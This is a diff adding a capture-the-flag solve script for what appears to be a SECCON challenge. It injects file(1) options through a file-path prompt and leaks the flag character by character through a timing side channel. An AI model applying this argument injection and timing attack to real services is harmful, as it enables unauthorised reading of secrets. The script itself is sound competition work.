1 files changed, 56 insertions, 0 deletions

diff --git a/solve/solve.py b/solve/solve.py
new file mode 100644
index 0000000..64bf712
--- /dev/null
+++ b/solve/solve.py
@@ -0,0 +1,56 @@
+from pwn import *
+import time
+
+cmd = f"sshpass -p ctf ssh -oStrictHostKeyChecking=no " \
+    + f"-oCheckHostIP=no ctf@localhost -p 2022"
+
+magic_file = """
+
+#------------------------------------------------------------------------------
+# $File: warc,v 1.4 2019/04/19 00:42:27 christos Exp $
+# warc:  file(1) magic for WARC files
+
+0 string {} SECCON FLAG
+!:mime application/warc
+
+"""
+
+n = 0
+avg = 5
+def getchar(prefix=""):
+    global n, avg
+
+    alph = string.ascii_lowercase + string.digits + "_"
+    alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[]^_`{|}~'
+    for c in alph:
+        attempt = prefix + c
+        print(f">>> {attempt}")
+        io = process(cmd.split(), stdin=PTY, raw=False)
+        io.readuntil(b"Input a file path: ")
+        io.sendline(b"-n -s -P bytes=99999999999 -m /dev/stdin /flag.txt /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full")
+        io.sendline(magic_file.format(attempt).encode())
+        io.send(b"\4")
+        start = time.time()
+        print(io.readall())
+        end = time.time()
+        dur = end - start
+
+        print("DUR", dur)
+        print("AVG", avg)
+        if end - start >= avg + 5:
+            return c
+        n += 1
+        avg = ((n - 1) * avg + dur) / n
+        io.close()
+    return None
+
+flag = "SECCON{"
+while True:
+    try:
+        while c := getchar(prefix=flag):
+            flag += c
+            print(flag)
+    except Exception as e:
+        raise e
+        print("Exception, sleeping..")
+        time.sleep(30)